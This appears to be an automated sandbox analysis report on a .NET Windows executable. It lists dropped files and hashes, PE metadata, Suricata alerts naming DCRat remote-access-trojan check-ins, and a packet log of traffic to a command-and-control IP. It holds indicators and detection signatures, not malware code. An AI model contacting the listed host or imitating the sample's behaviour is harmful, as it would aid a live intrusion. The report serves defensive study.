SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gyz3e1ke.vbt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ir4undov.4x2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcgwvlhj.tmf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mg0zuusf.mx2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oq53yb4r.5lk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pp3u1yz3.n3i.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_weie2vo1.orc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wlw1bghy.c1l.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnmxim5u.jsw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwzhknhf.jf4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\a4xFvqKqPO

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aK6cqCifWz

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\hrFrrrE362

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774724
Encrypted:	false
SSDEEP:	3:y1GVi1JoHbn:ykiQb
MD5:	75948FFB1BBE2B4342E49A54A2F0EB18
SHA1:	F3A78067C16F54A9E3F84199AD7BE628808A1E20
SHA-256:	80690C128170A034F589E067A8CC6561BD98EE3BC6AC7DF60268F009958A1EC6
SHA-512:	0F8A8E72E7FAC176757085DD1CE5D8DF40D508F09C65AB6EE2599C567D7069D563C75D5856270F25B647A3552B72DE12D6A95F88DB11FBDBA30DF6C32D8D1711
Malicious:	false
Preview:	xDopPc4srgfGxRl6A4MroWnWV

C:\Users\user\AppData\Local\Temp\jxuhyalTAq

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\l5ItcFP1am

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\o5GKJGLmor

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xmSCYhv5P6

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.780203981936945
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXyVTtQt7XW8EKvr16vj:Vx993DEUFtAXW8Ep
MD5:	F9D60C45B1EE911B50CB3D1B4EB9A3E0
SHA1:	4A5FF0ADE89CEFEE1D170BBCB8E037818FA503EC
SHA-256:	306FA888C6BAF77724AF7181202D8C34C8AF37901757204B5EA8163C713D4029
SHA-512:	11060712A1C7081870E63D4CBCBE4E568384968FA0D21F3DA1302CA1BFA6AD2C0AF7160D1C4BC0548E95615C8970FCF99E5AC9164945CACFB4192D79E273131B
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 02/01/2025 20:21:43..20:21:43, error: 0x80072746.20:21:48, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.165635852196137
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	ogVinh0jhq.exe
File size:	1'453'056 bytes
MD5:	11233270109a3d109a5e332c13c47f86
SHA1:	37a57b1b1850ac7927f827d8748627b3007a798c
SHA256:	757ddfaea3c3fe1d283195f096eebe58fb45d87359773e3a53a983d5b78a6f04
SHA512:	5bcee0d7ba90ec91769ad53a03ed4358eb73311bb526e5b4c40d623a0e07d80e633246faf9b15b48bdf76963c32b26aee11388cb840a4d3fb6ef7eb2021d06da
SSDEEP:	24576:duJOV2wL/IeP69t9ovXlKr//azjjmAmE+aFEPi2l+o:duJ4LH69tkmGjjD7FE
TLSH:	23658C117E44CE11F0091233C3EF4A8957B1D961AAA6E71B7DBA3B6E15123A33C1D9CB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb.....................6........... ... ....@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x5610ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6272A3D7 [Wed May 4 16:03:35 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1610a0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x166000	0x218	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x168000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x15f0f4	0x15f200	70beee2650553e6eb2dc2b2a4ec74b40	False	0.7142715101014596	data	7.194999016081263	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0x162000	0x2fdf	0x3000	c56376df81dec952fde8428948bdc4c9	False	0.3104654947916667	data	3.2435648610267442	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x166000	0x218	0x400	dd7691b609daebae626673755bf2c4d6	False	0.26171875	data	1.8390800949553323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x168000	0xc	0x200	351a3517e380d6463467de69e1d234f9	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x166058	0x1c0	ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970	English	United States	0.5223214285714286

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T00:27:13.768439+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.4	49733	141.8.192.151	80	TCP
2025-01-03T00:27:43.567663+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	141.8.192.151	80	192.168.2.4	49743	TCP
2025-01-03T00:28:46.568351+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	141.8.192.151	80	192.168.2.4	50015	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 00:27:11.049343109 CET	49730	443	192.168.2.4	104.20.4.235
Jan 3, 2025 00:27:11.049386978 CET	443	49730	104.20.4.235	192.168.2.4
Jan 3, 2025 00:27:11.053915024 CET	49730	443	192.168.2.4	104.20.4.235
Jan 3, 2025 00:27:11.117618084 CET	49730	443	192.168.2.4	104.20.4.235
Jan 3, 2025 00:27:11.117643118 CET	443	49730	104.20.4.235	192.168.2.4
Jan 3, 2025 00:27:11.585401058 CET	443	49730	104.20.4.235	192.168.2.4
Jan 3, 2025 00:27:11.585483074 CET	49730	443	192.168.2.4	104.20.4.235
Jan 3, 2025 00:27:11.588952065 CET	49730	443	192.168.2.4	104.20.4.235
Jan 3, 2025 00:27:11.588962078 CET	443	49730	104.20.4.235	192.168.2.4
Jan 3, 2025 00:27:11.589251041 CET	443	49730	104.20.4.235	192.168.2.4
Jan 3, 2025 00:27:11.764724970 CET	49730	443	192.168.2.4	104.20.4.235
Jan 3, 2025 00:27:11.772382021 CET	49730	443	192.168.2.4	104.20.4.235
Jan 3, 2025 00:27:11.819330931 CET	443	49730	104.20.4.235	192.168.2.4
Jan 3, 2025 00:27:12.275155067 CET	443	49730	104.20.4.235	192.168.2.4
Jan 3, 2025 00:27:12.275243998 CET	443	49730	104.20.4.235	192.168.2.4
Jan 3, 2025 00:27:12.275331020 CET	49730	443	192.168.2.4	104.20.4.235
Jan 3, 2025 00:27:12.915580034 CET	49730	443	192.168.2.4	104.20.4.235
Jan 3, 2025 00:27:12.981110096 CET	49733	80	192.168.2.4	141.8.192.151
Jan 3, 2025 00:27:12.987622023 CET	80	49733	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:12.987715006 CET	49733	80	192.168.2.4	141.8.192.151
Jan 3, 2025 00:27:12.987802982 CET	49733	80	192.168.2.4	141.8.192.151
Jan 3, 2025 00:27:12.994121075 CET	80	49733	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:13.768255949 CET	80	49733	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:13.768282890 CET	80	49733	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:13.768439054 CET	49733	80	192.168.2.4	141.8.192.151
Jan 3, 2025 00:27:13.899174929 CET	80	49733	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:13.952246904 CET	49733	80	192.168.2.4	141.8.192.151
Jan 3, 2025 00:27:13.968220949 CET	49733	80	192.168.2.4	141.8.192.151
Jan 3, 2025 00:27:13.973077059 CET	80	49733	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:14.168621063 CET	49736	80	192.168.2.4	141.8.192.151
Jan 3, 2025 00:27:14.174315929 CET	80	49736	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:14.174400091 CET	49736	80	192.168.2.4	141.8.192.151
Jan 3, 2025 00:27:14.174628019 CET	49736	80	192.168.2.4	141.8.192.151
Jan 3, 2025 00:27:14.179482937 CET	80	49736	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:14.179558039 CET	80	49736	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:14.182140112 CET	80	49733	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:14.190882921 CET	49733	80	192.168.2.4	141.8.192.151
Jan 3, 2025 00:27:14.195663929 CET	80	49733	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:14.402713060 CET	80	49733	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:14.404134035 CET	49733	80	192.168.2.4	141.8.192.151
Jan 3, 2025 00:27:14.410679102 CET	80	49733	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:14.412319899 CET	80	49733	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:14.771512985 CET	80	49733	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:14.849374056 CET	80	49736	141.8.192.151	192.168.2.4
Jan 3, 2025 00:27:14.956197977 CET	49733	80	192.168.2.4	141.8.192.151
Jan 3, 2025 00:27:14.956321001 CET	49736	80	192.168.2.4	141.8.192.151
